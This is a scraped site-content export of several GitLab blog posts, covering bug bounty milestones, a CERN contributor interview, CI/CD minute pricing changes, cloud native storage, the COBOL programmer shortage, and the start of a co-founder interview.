   \n\nBeing transparent about our security issues allows customers to see the importance we place on securing our product. There are security issues in every tool and application out there – that’s a given. By disclosing full vulnerability information after 30 days, we give customers the time and information to understand the vulnerabilities that have been found and fixed, and to determine any potential impact in their environment. 
Being transparent about our environment helps us to grow and strengthen the trust customers place in us. Also publicly disclosing valid bugs reduces the threshold to contribute and helps security reporters build upon previous findings, which ultimately makes our product and customers more secure.  \n\n[Iteration](https://handbook.gitlab.com/handbook/values/#iteration) is one of GitLab’s core values. And our bug bounty program is no different. In the time since launching our public program at the end of 2018, we’ve taken feedback from our security research community and [reduced the time to bounty payout](/blog/reducing-time-to-payout-and-launching-a-bug-bounty-anniversary-contest/), moving part of the payout to the moment a report is triaged (on average, 5 days after the report is submitted), with the remainder of the payment happening once the report is resolved. Another improvement that’s been especially popular has been our decision to increase bounties for [critical and high severity reports](/blog/were-increasing-bounties-in-our-bug-bounty-program/). But, we know it's not all about bounties and payouts. Other less exciting, but key, foundational components of our program like [triage, response and overall communications](/blog/what-we-learned-by-taking-our-bug-bounty-program-public/) stay top of mind to ensure we’re keeping hackers engaged.   \n\n### And, what does the next million dollars in bounties paid hold? \n\nWe were proud to see the results of our most recent [bug bounty contest](/blog/bugs-bounties-and-cherry-browns/) (held October 1-November 30, 2019) include 279 reports from 123 different individuals (89 of them coming from new reporters!). We aim to keep reporters incentivized, motivated, and engaged to find bugs on our platform. 
Our public bug bounty program is as important to the security of our product and company as any other program we run within our Security Team here at GitLab, so we will continue to look at how we can strengthen and improve our processes and program, but also invite the feedback of our security research community for changes and updates they’d like to see.  \n\nThank you to the security research community for your expertise, your innovative findings and techniques, and for making our product stronger and more secure!  \n\nHappy Hacking!   \n\n\nPhoto by [Joey Theswampboi](https://www.pexels.com/@joey-theswampboi-442839) on [Pexels](https://pexels.com/)\n{: .note}\n",[865,995,9],{"slug":1182,"featured":6,"template":689},"celebrating-one-million-bug-bounties-paid","content:en-us:blog:celebrating-one-million-bug-bounties-paid.yml","Celebrating One Million Bug Bounties Paid","en-us/blog/celebrating-one-million-bug-bounties-paid.yml","en-us/blog/celebrating-one-million-bug-bounties-paid",{"_path":1188,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1189,"content":1195,"config":1200,"_id":1202,"_type":14,"title":1203,"_source":16,"_file":1204,"_stem":1205,"_extension":19},"/en-us/blog/cern-contributor-post",{"title":1190,"description":1191,"ogTitle":1190,"ogDescription":1191,"noIndex":6,"ogImage":1192,"ogUrl":1193,"ogSiteName":673,"ogType":674,"canonicalUrls":1193,"schema":1194},"GitLab Code Contributor: Daniel Juarez","Daniel Juarez shares his experience contributing to GitLab from CERN.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673096/Blog/Hero%20Images/contributors-cover.png","https://about.gitlab.com/blog/cern-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Daniel Juarez\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-06-19\",\n      
}",{"title":1190,"description":1191,"authors":1196,"heroImage":1192,"date":1197,"body":1198,"category":10,"tags":1199},[704],"2019-06-19","\n\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm excited to introduce [Daniel Juarez](https://gitlab.com/danieljg) from [CERN](https://home.cern/).\n\n### Can you tell us about what you do at CERN and what Geneva is like?\n\nI started working at CERN in September 2017 as an associate for the Version Control Systems team. I came to CERN from the [University of Oviedo](http://www.uniovi.es/en) in Spain, as the university has an arrangement with CERN to give its students an opportunity to work here. One of my main responsibilities is to improve, maintain, and support the GitLab setup at CERN, as well as the continuous integration (CI) infrastructure.\n\n[Geneva](https://www.google.com/maps/place/Geneva,+Switzerland/@46.2050241,6.1089833,13z) feels like an extension of CERN, as you can meet people from all over the world with so many international organizations in the city. It may not be the best place in the winter if you are not into skiing, but the city has a wonderful lake and is full of life in the summer.\n\n![Daniel Juarez](https://about.gitlab.com/images/blogimages/Daniel_Juarez.jpeg){: .shadow.small.right.wrap-text}\n\n### How long have you used GitLab and why did you decide to make contributions?\n\nI first used GitLab when I joined CERN. Contributing to GitLab is part of my job, and [my first merge request (MR)](https://gitlab.com/gitlab-org/gitlab-runner/merge_requests/965) was on [the Runner project](https://gitlab.com/gitlab-org/gitlab-runner).\n\nIn addition to MRs, I create issues and work with the GitLab team to find solutions. A good example is the [storage performance issue](https://gitlab.com/gitlab-org/gitlab-ee/issues/11556) that we ran into recently.\n\n### Do you plan/coordinate contributions to GitLab at CERN or is contribution done on an individual basis? 
Any advice for GitLab customers who want to make contributions?\n\nWe keep track of our current GitLab issues and improvement areas in our internal Jira instance, and from there we organize who will submit an MR or open an issue with GitLab. We have a few other GitLab contributors at CERN, like [Alex Lossent](https://gitlab.com/alexcern) and [Borja Aparicio](https://gitlab.com/baparici).\n\nIn terms of advice for others, I encourage people to ping GitLab team members, such as product managers or maintainers, if you feel like your MRs or issues are not being picked up in a timely manner. You can find GitLab team members either on the [team page](/company/team/) or the [product categories page](/handbook/product/categories/). It's also helpful to note how many users are being impacted by your issue. Even though only one person from your organization may be commenting on an issue or MR, it could actually have an impact on thousands of people.\n\n### What has been your experience when contributing to GitLab?\n\nGitLab team members are always eager to help. They show interest in community issues and MRs, which is highly appreciated. Engagement from the GitLab team has helped us improve the service we provide to ~16,000 GitLab users at CERN.\n\nHowever, we are concerned about the large number of open issues at GitLab. Even if issues have the `customer` label, we are concerned that sometimes they could be forgotten.\n\n### Are there any community contributions (MRs) to GitLab that you thought were particularly interesting/useful?\n\nFrom CERN, we were definitely happy to have [SAML support](/releases/2015/06/22/gitlab-7-12-released/) a few years ago. We also found [Shared CI Runners for groups](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9646) to be helpful, because some of our users were required to have the same runner registered against multiple projects instead of having it per group. 
This clearly improved the service for many of our users that rely on private runners and cannot use our shared infrastructure.\n\n### What do you like to do when you're not working?\n\nI love playing video games no matter the genre. Recently, I started watching bad movies and learning to cook new dishes (usually at the same time). I find that cooking helps me digest the bad movies!\n\n### Anything else you want to share with the community?\n\nDo not be afraid to submit MRs! It might look difficult in the beginning, but GitLab team members will do their best to help your changes \"go upstream\" to GitLab. I learned that wider community members are also willing to help.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1201,"featured":6,"template":689},"cern-contributor-post","content:en-us:blog:cern-contributor-post.yml","Cern Contributor Post","en-us/blog/cern-contributor-post.yml","en-us/blog/cern-contributor-post",{"_path":1207,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1208,"content":1214,"config":1220,"_id":1222,"_type":14,"title":1223,"_source":16,"_file":1224,"_stem":1225,"_extension":19},"/en-us/blog/ci-cd-github-extended-again",{"title":1209,"description":1210,"ogTitle":1209,"ogDescription":1210,"noIndex":6,"ogImage":1211,"ogUrl":1212,"ogSiteName":673,"ogType":674,"canonicalUrls":1212,"schema":1213},"We're extending free usage of CI/CD for GitHub for another six months!","Get another six months' use of CI/CD for GitHub on GitLab.com, free of 
charge.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666262/Blog/Hero%20Images/default-blog-image.png","https://about.gitlab.com/blog/ci-cd-github-extended-again","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're extending free usage of CI/CD for GitHub for another six months!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"William Chia\"}],\n        \"datePublished\": \"2019-09-09\",\n      }",{"title":1209,"description":1210,"authors":1215,"heroImage":1211,"date":1217,"body":1218,"category":299,"tags":1219},[1216],"William Chia","2019-09-09","\n\n[CI/CD for GitHub](/solutions/github/) allows you to host your code on GitHub while taking advantage of GitLab for CI/CD. In fact, [CI/CD for external repos](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/) lets you use any Git repo as a host together with GitLab CI/CD.\n\nWhen we first released the ability to use GitLab CI/CD with other Git repositories we placed it into our [Premium tier](/pricing/premium/) for GitLab Self-Managed. Normally, features go into a corresponding pricing tier on GitLab.com but we believed this was a specific case where we should offer a feature for free on GitLab.com because of the amount of repos on GitHub.com. Not knowing how long we'd keep this pricing, we set a deadline of one year. When that time came, we extended for six months.\n\nToday, we are extending the deadline for using CI/CD for external repos, including CI/CD for GitHub again. Now you'll have until **Mar. 22, 2020** to use these capabilities with private repos (see below for open source) as a [Free or Bronze](/pricing/) user on GitLab.com. This feature will continue to be part of the [Premium tier](/pricing/premium/) for GitLab Self-Managed.\n\n## Always free for open source\n\nThis extension applies to private repos hosted on GitLab.com. 
As part of our commitment to open source, [public projects get all the features of Gold for free](/solutions/open-source/). GitLab CI/CD for GitHub works by automatically mirroring your repos to GitLab.com. As such, if you have a public project on GitHub, it will also be public on GitLab so you can always take advantage of GitLab CI/CD for public projects.\n\n## Why we're extending the offer\n\nFor a rationale on our extension see our previous blog post when we [first extended external CI/CD](/blog/six-more-months-ci-cd-github/). When it came to the current deadline we found that the reasoning still held true and [decided to extend again](https://gitlab.com/gitlab-org/gitlab-ee/issues/13065).\n\nAs always, we'd love your feedback in the comments below.\n",[109,685,267,9],{"slug":1221,"featured":6,"template":689},"ci-cd-github-extended-again","content:en-us:blog:ci-cd-github-extended-again.yml","Ci Cd Github Extended Again","en-us/blog/ci-cd-github-extended-again.yml","en-us/blog/ci-cd-github-extended-again",{"_path":1227,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1228,"content":1233,"config":1239,"_id":1241,"_type":14,"title":1242,"_source":16,"_file":1243,"_stem":1244,"_extension":19},"/en-us/blog/ci-minutes-for-free-users",{"title":1229,"description":1230,"ogTitle":1229,"ogDescription":1230,"noIndex":6,"ogImage":1211,"ogUrl":1231,"ogSiteName":673,"ogType":674,"canonicalUrls":1231,"schema":1232},"Changes to CI pipeline minutes for new free users","This change better aligns to GitLab's buyer-based open-core model.","https://about.gitlab.com/blog/ci-minutes-for-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Changes to CI pipeline minutes for new free users\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-03-18\",\n      
}",{"title":1229,"description":1230,"authors":1234,"heroImage":1211,"date":1236,"body":1237,"category":930,"tags":1238},[1235],"Sid Sijbrandij","2020-03-18","___Update October 8, 2024: This blog is superseded by the blog post announcing [upcoming changes to CI/CD minutes for free tier users on GitLab.com](https://about.gitlab.com/blog/ci-minutes-update-free-users/). Please refer to our [pricing page](https://about.gitlab.com/pricing/) for the full breakdown of usage limits per tier.___\n\nEffective Sunday March 15, 2020, UTC, we are making changes to the CI pipeline minutes offered to *new* free users.\nMoving forward, all free accounts will have 2000 pipeline minutes per group per month independent of the visibility of the project.\nExisting free users will not have their plans changed.\n\n## What are pipeline minutes?\n\nAs we share on our [pricing page](https://about.gitlab.com/pricing/),\n\n> Pipeline minutes are the execution time for your pipelines on our shared runners. \n> Execution on your own runners will not increase your pipeline minutes count and is unlimited.\n\nPipeline minutes are a crucial part of what makes GitLab special.\n\n## Where did this come from?\n\nOne of our core values at GitLab is [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency).\nAs GitLab grows and matures as both a company and a product, we've [really focused on becoming a more efficient company](https://youtu.be/wrnWaYS7Fgo?t=275). \nThis includes making sure we're being efficient in our CI offerings. \n\nAs we work on some new improvements to CI, including Windows and MacOS runners, we evaluated usage by free users.\nFrom an internal analysis, we found that 95% of free users who used CI minutes in January 2020 used fewer than 1000 CI minutes.\nBut we're not talking about 1000 minutes, we're talking about twice that. \nAnd 2000 minutes is a lot of minutes.\nThat's over an hour of CI minutes every day. 
\n\nWe are constantly working to provide the most value to our community through GitLab.\nThe best way we can do that is by strengthening our open source offering, including [make any features open source that are eligible to be open source](/company/pricing/#if-a-feature-can-be-moved-down-do-it-quickly).\n\n## What if that's not enough minutes?!\n\nIf 2000 minutes isn't enough, free users can buy [additional CI minutes](https://docs.gitlab.com/ee/subscriptions/#purchasing-additional-ci-minutes).\n\nAlternatively, you can bring your own runners. \nYou can [run specific runners for any of your projects](https://docs.gitlab.com/runner/). \nWe only count minutes on the shared runners we provide on GitLab.com.\n\n## What's next?\n\nExcited about all the cool things that can be done with CI?\nMe too!\n\nHere are some other things coming down the pipeline in the next couple of releases:\n\n* [Dynamic child pipeline creation via artifact includes](https://gitlab.com/gitlab-org/gitlab/-/issues/35632)\n* [Autoscaling GitLab CI jobs on AWS Fargate (MVC)](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2972)\n* [Notifications for when pipelines are fixed](https://gitlab.com/gitlab-org/gitlab/-/issues/24309)\n",[109,685,267,9],{"slug":1240,"featured":6,"template":689},"ci-minutes-for-free-users","content:en-us:blog:ci-minutes-for-free-users.yml","Ci Minutes For Free Users","en-us/blog/ci-minutes-for-free-users.yml","en-us/blog/ci-minutes-for-free-users",{"_path":1246,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1247,"content":1252,"config":1257,"_id":1259,"_type":14,"title":1260,"_source":16,"_file":1261,"_stem":1262,"_extension":19},"/en-us/blog/ci-minutes-update-free-users",{"title":1248,"description":1249,"ogTitle":1248,"ogDescription":1249,"noIndex":6,"ogImage":1211,"ogUrl":1250,"ogSiteName":673,"ogType":674,"canonicalUrls":1250,"schema":1251},"Upcoming changes to CI/CD minutes for free tier users on GitLab.com","The reduction of CI/CD minutes aligns with the 
majority of free user usage","https://about.gitlab.com/blog/ci-minutes-update-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Upcoming changes to CI/CD minutes for free tier users on GitLab.com\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-09-01\",\n      }",{"title":1248,"description":1249,"authors":1253,"heroImage":1211,"date":1254,"body":1255,"category":930,"tags":1256},[1235],"2020-09-01","\nAt GitLab, we’ve been actively working towards empowering our community to make DevOps a reality for teams of all sizes. We’ve constantly [moved features down](/blog/new-features-to-core/) to our free product to enable more users to benefit from it. The [lower tiers offer more relative value](/company/pricing/#lower-tiers-have-more-relative-value) and help to get more users access to a complete DevOps platform.\n\nAs a result, the usage of GitLab has grown significantly over time to an estimated [30 million registered users](/why-gitlab/) - of which almost 6 million GitLab.com users are on our GitLab.com free tier. While we are excited by this exponential growth, our underlying costs to support this growth have increased significantly. As GitLab matures as both a company and a product, we must focus on becoming a more efficient company.\n\nWe evaluated CI/CD minute usage and found that 98.5% of free users use 400 CI/CD minutes or less per month. 
By lowering the current monthly usage limit, we are not only aligning the CI/CD minute limits with usage and related tier prices, but ensuring we can continue to maintain our commitment to offer a free GitLab.com tier.\n\n## Changes to the GitLab.com Free tier\n\nEffective October 1, 2020, we are reducing CI/CD minutes to 400 minutes per top-level group (or personal namespace) per month on the Free tier of GitLab.com.\n\n|    | Free | Bronze | Silver | Gold |\n| -- | ---- | ------ | ------ | ---- |\n| Price | $0 | $4 | $19 | $99 |\n| CI/CD Minutes | 400 | 2,000 | 10,000 | 50,000 |\n\n## Check and reduce CI/CD minutes used\n\nCI/CD minute usage can be reduced in a number of ways, including [bringing your own runners](https://docs.gitlab.com/runner/).\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/GrO-8KtIpRA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nFor more details on the changes and how to manage and reduce your CI/CD minutes usage, please visit the [customer FAQ](/pricing/faq-compute-credit/).\n\n## Options to increase CI/CD minutes available\n\nIf 400 minutes is not enough, you can purchase additional CI/CD minutes at $10 per 1000 minutes or upgrade to [a paid tier](/pricing/). Also, you can bring your own runners. You can [run specific runners for any of your projects](https://docs.gitlab.com/runner/). We only count minutes on the shared runners we provide on GitLab.com.\n\nGitLab also offers Gold tier capabilities and 50,000 minutes per group per month CI/CD minutes for our [Open Source](/solutions/open-source/join/), [Education](/solutions/education/), and [Startups](/solutions/startups/) programs. 
If you are eligible for these programs, consider applying through their relevant program pages.\n\n## CI/CD minute limits will remain unchanged for Open Source, Education and Startups programs\n\nCI/CD minute limits will **remain unchanged** for members of our GitLab for [Open Source](/solutions/open-source/join/), [GitLab for Education](/solutions/education/), and [GitLab for Startups](/solutions/startups/) programs and will continue to match our [Gold tier](/pricing/). For more information on these programs and how to apply, please visit the relevant program pages.\n\n## More information\n\nPlease refer to the [customer FAQ](/pricing/faq-compute-credit/) for more information.\n\nTo address your questions and feedback, we have created a space in the [GitLab Community Forum](https://forum.gitlab.com/t/ci-cd-minutes-for-free-tier/40241), which is actively monitored by GitLab Team members and Product Managers involved with this change.\n",[109,685,267,9],{"slug":1258,"featured":6,"template":689},"ci-minutes-update-free-users","content:en-us:blog:ci-minutes-update-free-users.yml","Ci Minutes Update Free Users","en-us/blog/ci-minutes-update-free-users.yml","en-us/blog/ci-minutes-update-free-users",{"_path":1264,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1265,"content":1271,"config":1277,"_id":1279,"_type":14,"title":1280,"_source":16,"_file":1281,"_stem":1282,"_extension":19},"/en-us/blog/cloud-native-storage-beginners",{"title":1266,"description":1267,"ogTitle":1266,"ogDescription":1267,"noIndex":6,"ogImage":1268,"ogUrl":1269,"ogSiteName":673,"ogType":674,"canonicalUrls":1269,"schema":1270},"A guide to cloud native storage for beginners","Choosing a cloud native development strategy is a smart step in DevOps, but storage can be a challenge. 
Here’s what you need to consider.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681560/Blog/Hero%20Images/cloudnative.jpg","https://about.gitlab.com/blog/cloud-native-storage-beginners","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to cloud native storage for beginners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-09-10\",\n      }",{"title":1266,"description":1267,"authors":1272,"heroImage":1268,"date":1274,"body":1275,"category":682,"tags":1276},[1273],"Valerie Silverthorne","2020-09-10","\n\n[DevOps](/topics/devops/) and cloud native go hand-in-hand but that doesn’t mean the journey is straightforward, particularly when it comes to storage. Here’s everything you need to know about cloud-native storage if you’re just getting started. \n\n## What is cloud-native software development?\n\nBoiled down, the term [cloud native](/topics/cloud-native/) simply means taking advantage of the power of the cloud and doing so from the beginning of the software development lifecycle. Flexibility, speed, and “always on” capabilities make the cloud an ideal place for [modern software development](https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html).\n\nAlthough [containers aren’t limited to just the cloud](https://containerjournal.com/features/what-do-containers-have-to-do-with-being-cloud-native-anyway/), they are a key part of cloud native software development because they make it simple to move chunks of code from cloud to cloud using the same set of tools and processes. Containers can be created, moved or deleted with just the click of a mouse. [Kubernetes](/solutions/kubernetes/) is an increasingly popular open source tool for managing containers.\n\n## Why storage is the stumbling block\n\nSo far, so good, but what about storage? 
The features that make containers so ideal for cloud native (flexible, portable, disposable) are the same things that make them a storage nightmare. Developers finished with containers can just kill them – but for most apps to work, they need access to reliable storage that can’t be eliminated. \n\nAnd that’s the big hiccup when it comes to cloud native storage, says [Brendan O’Leary](/company/team/#brendan), senior developer evangelist at GitLab. “Almost every app in existence needs database storage,” Brendan explains. “But in a cloud native world things come and go but storage can’t do that. Storage has to stick around and solving for that is the hardest part of cloud native. That’s the thing we need to conquer next.”\n\nThe [Cloud Native Computing Foundation](https://www.cncf.io/) says the goal is to create [\"persistent information\"](https://www.cncf.io/blog/a-complete-storage-guide-for-your-kubernetes-storage-problems/) that exists no matter what’s going on around it. Ideally the CNCF recommends that information not be stored in what it calls \"volatile\" containers.\n\n## Solutions on the horizon\n\nThe good news is that a number of companies are trying to solve the tricky problem of cloud native storage. 
Here’s a quick look in no particular order (Cockroach and Rancher are GitLab partners):\n\n* [OpenEBS]( https://openebs.io) is a Kubernetes-based tool to create stateful applications using Container Attached Storage.\n* Also Kubernetes-based, [Rook](https://rook.io) offers self-managed, scaling, and healing storage services.\n* [Cockroach Labs](https://www.cockroachlabs.com/) uses Distributed SQL to make databases portable and scalable.\n* [Rancher Longhorn](https://longhorn.io) offers persistent storage for Kubernetes.\n\n## Final considerations\n\nA Gartner Group report, “Top Emerging Trends in Cloud-Native Infrastructure”, advises clients to “choose storage solutions aligned with container-native data service requirements and the standard storage interface, [Container Storage Interface (CSI)](https://www.architecting.it/blog/container-storage-interface/). CSI is an API that lets container orchestration platforms like Kubernetes seamlessly communicate with stored data via a plug-in. \n\nAnd finally, there’s no shame in choosing something straightforward, Brendan suggests, particularly if you’re just getting started in the Kubernetes world. “You can go with a cloud provider’s data storage options,” he says. “That’s still cloud native but it’s even simpler to just use the tools that exist. 
Don’t try to reinvent the wheel.”\n\nCover image by [Joshua Coleman](https://unsplash.com/@joshstyle) on [Unsplash](https://unsplash.com)\n{: .note}\n",[845,1038,9],{"slug":1278,"featured":6,"template":689},"cloud-native-storage-beginners","content:en-us:blog:cloud-native-storage-beginners.yml","Cloud Native Storage Beginners","en-us/blog/cloud-native-storage-beginners.yml","en-us/blog/cloud-native-storage-beginners",{"_path":1284,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1285,"content":1291,"config":1296,"_id":1298,"_type":14,"title":1299,"_source":16,"_file":1300,"_stem":1301,"_extension":19},"/en-us/blog/cobol-programmer-shortage",{"title":1286,"description":1287,"ogTitle":1286,"ogDescription":1287,"noIndex":6,"ogImage":1288,"ogUrl":1289,"ogSiteName":673,"ogType":674,"canonicalUrls":1289,"schema":1290},"How can we help solve the COBOL programmer shortage?","A shortage of COBOL programmers is causing delays in processing unemployment claims and small business loans. We’re hoping our community can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667886/Blog/Hero%20Images/cobolshortage.jpg","https://about.gitlab.com/blog/cobol-programmer-shortage","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How can we help solve the COBOL programmer shortage?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-04-23\",\n      }",{"title":1286,"description":1287,"authors":1292,"heroImage":1288,"date":1293,"body":1294,"category":10,"tags":1295},[1273],"2020-04-23","\n\nIn our current world situation is it any surprise that a shortage of COBOL developers is holding up unemployment benefits and Small Business Association loan processing?\n\nActually, it is kind of surprising. 
We’ve grown used to the rapid advance of technology and it’s safe to say we’re like most companies – looking forward and not backward.\n\n## COBOL programmers needed\n\nBut it might be time to change that, and we’re reaching out to all of you for ideas and suggestions on ways to help provide a solution to the large number of COBOL programmers needed. What can we, as a community, do to help government agencies overwhelmed with demands on aging mainframes and with too few programmers to get the jobs done?\n\nCNN and a number of other news agencies reported that a lack of COBOL programming expertise has led to [long waits in processing unemployment benefits and small business loans](https://www.techspot.com/news/84796-us-states-desperate-cobol-programmers-ibm-offering-free.html?fbclid=IwAR1M2tlg2MeLHsG7ZzHawzPtsliTBaJX-1EgTlxIdr4BSHihN6sn-JbKpeo) at a time when [joblessness has hit record highs](https://www.washingtonpost.com/business/2020/04/16/unemployment-claims-coronavirus/).\n\n### Oppertunities for COBOL programmers\n\nBut COBOL isn’t limited to government entities: Large financial services and a myriad of other industries are still heavily reliant on mainframes and their primary programming language. As such,there is a large number of COBOL programmers needed with a wide array of oppertunities available. That’s not likely to change anytime soon – IBM says there are 240 billion lines of COBOL running today with an additional 5 billion being written every year.\n\nWhile that may sound like job security, COBOL programming isn’t widely taught today and it certainly lacks the developer interest level of Ruby or TypeScript or Go. 
A quick search on job site [Glassdoor](https://www.glassdoor.com/) shows about 1700 jobs advertised for COBOL programmers across the US today, while there are well over 4000 potential employers for Go or Ruby developers, and over 30,000 for Java developers.\n\nToday a number of companies [are working to integrate](https://www.rocketsoftware.com/zos-open-source/tools) more \"modern\" software development methodologies with mainframes ([even GitLab](https://gitlab.com/gitlab-org/gitlab-runner/issues/3263)), but that’s not going to solve the short-term need (or probably even the medium-term need).\n\n### Education and Upskilling for COBOL programmers\n\nThere are some educational opportunities available from [Udemy](https://www.udemy.com/course/mainframe-the-complete-cobol-course-from-beginner-to-expert/), [LinkedIn](https://www.linkedin.com/learning/topics/cobol), [Learning Tree](https://www.learningtree.com/courses/2301/enterprise-cobol-programming-part-1/) and a [free COBOL programming course](https://github.com/openmainframeproject/cobol-programming-course) from the openmainframeproject on GitHub.\n\nCan we do more? We don’t have the answers but we’ve opened [a public issue](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/7271) so please leave any ideas there.\n\n_Updated on June 1, 2020: We've had some responses on our public issue including this from contributor [Timothy Austin](https://gitlab.com/taustin288): \"The companies who hold all these large COBOL code bases need to pressure the universities to require all up and coming Java programmers to have a rudimentary knowledge of COBOL. 
This would allow them the flexibility to convert the COBOL or continue use it as is if they so desire.\" Learn more in [our issue](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/7271)._ \n\nCover image by [Joshua Sortino](https://unsplash.com/@sortino) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[267,708,9],{"slug":1297,"featured":6,"template":689},"cobol-programmer-shortage","content:en-us:blog:cobol-programmer-shortage.yml","Cobol Programmer Shortage","en-us/blog/cobol-programmer-shortage.yml","en-us/blog/cobol-programmer-shortage",{"_path":1303,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1304,"content":1310,"config":1316,"_id":1318,"_type":14,"title":1319,"_source":16,"_file":1320,"_stem":1321,"_extension":19},"/en-us/blog/cofounder-relations",{"title":1305,"description":1306,"ogTitle":1305,"ogDescription":1306,"noIndex":6,"ogImage":1307,"ogUrl":1308,"ogSiteName":673,"ogType":674,"canonicalUrls":1308,"schema":1309},"Co-founders: Key conversations build lasting relationships","Our CEO sits down with leadership psychologist Banu Hantal to discuss his relationship with GitLab co-founder Dmitriy Zaporozhets.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680642/Blog/Hero%20Images/cofounders_phone.jpg","https://about.gitlab.com/blog/cofounder-relations","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The secret to an enduring co-founder relationship? Have those crucial conversations\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-06-21\",\n      }",{"title":1311,"description":1306,"authors":1312,"heroImage":1307,"date":1313,"body":1314,"category":299,"tags":1315},"The secret to an enduring co-founder relationship? 
Have those crucial conversations",[927],"2019-06-21","\n\nIn the latest installment of our [Pick Your Brain](/blog/tags.html#pick-your-brain) series, leadership psychologist [Banu Hantal](https://www.banuhantal.com/) interviews our CEO [Sid Sijbrandij](/company/team/#sytses) about his relationship with co-founder and engineering fellow [Dmitriy Zaporozhets](/company/team/#dzaporozhets). In their discussion, Sid shares GitLab’s origin story and talks about how transparent communication with Dmitriy helps keep their partnership strong.\n\n## The beginning of GitLab\n\nDmitriy and Sid’s partnership started in the same place as most modern-day relationships: online. Dmitriy started GitLab while he was working elsewhere, and within a year of GitLab’s launch, 300 people had contributed code.\n\nSid saw that GitLab had potential as a service and started GitLab.com independently of Dmitriy. Sid didn’t need Dmitriy’s permission to do this, because [GitLab was (and partially remains) open source](/blog/gitlab-is-open-core-github-is-closed-source/), but reached out to Dmitriy to let him know about the next iteration of the project. Dmitriy was gracious and celebrated the fact that Sid was expanding the impact of GitLab.\n\nFor about a year, Sid invested in building GitLab.com while also working as a consultant until Dmitriy posted a tweet saying, “I want to work on GitLab full time.” That tweet changed GitLab’s story.\n\n“It was quite unusual to post that to the entire world. He was employed and everything,” says Sid. “I emailed Dmitriy and I said ‘Hey, I saw your tweet, how much do you want to earn to start working on GitLab?’”\n\nBy this time, there were a few big companies that were using GitLab.com and they were asking Sid to add new features to the product. 
Once Dmitriy came on board, it was possible to build those features quicker.\n\n“I went to the local Western Union money office, and when I said I wanted to wire money from the Netherlands to the Ukraine, they were like, ‘Do you know this person or is this someone you met over the internet?’”\n\n“You didn’t even know what Dmitriy looked like?!” exclaims Banu.\n\n“At that point my mental image of Dmitriy was like a pink mob boss because that was his avatar,” says Sid, but that didn’t last for long. They finally met in person in Krakow shortly after making plans to commit their efforts to GitLab full time.\n\n## Communication makes for happy co-founders\n\n\"Do you think having a mostly remote relationship is an advantage or disadvantage?\" asks Banu.\n\n\"I don't think it matters that much,\" says Sid. \"I think you do the same things, and you've got to make sure there's regular communication. To this day we have a call every single week. When there’s something important he gets a heads up so he doesn’t feel misinformed.\"\n\nIf there is an issue that is clearly contentious, Sid says, they put all the information on the table and discuss the problem directly.\n\n“I think surprises are really bad. You want to make sure if there’s something important that you get a heads up, and that there is a regular cadence of communication.”\n\nThough Dmitriy and Sid rarely get the chance to interact in person today, there is very little conflict in their relationship.\n\n## What to do when one co-founder is the CEO\n\n“What you don’t want is the [Peter Principle](https://en.wikipedia.org/wiki/Peter_principle), where the only way for an engineer to advance is to become a manager,” says Sid. “And then, oftentimes, you lose a great engineer and get a bad manager.”\n\nSo, they elected to structure GitLab the company so there are more leadership opportunities for engineers by offering a dual-career track. 
